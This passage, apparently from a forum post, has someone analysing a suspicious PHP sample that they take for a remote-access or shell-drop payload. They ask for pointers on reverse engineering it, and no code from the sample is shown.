We can easily see very interesting strings (headers, curl, ...); it looks like a remote access / shell-drop payload.
However I'm a bit stuck at this point, this code is beyond my php skills to fully reverse engineer.
Do you have any pointers to help me finish this?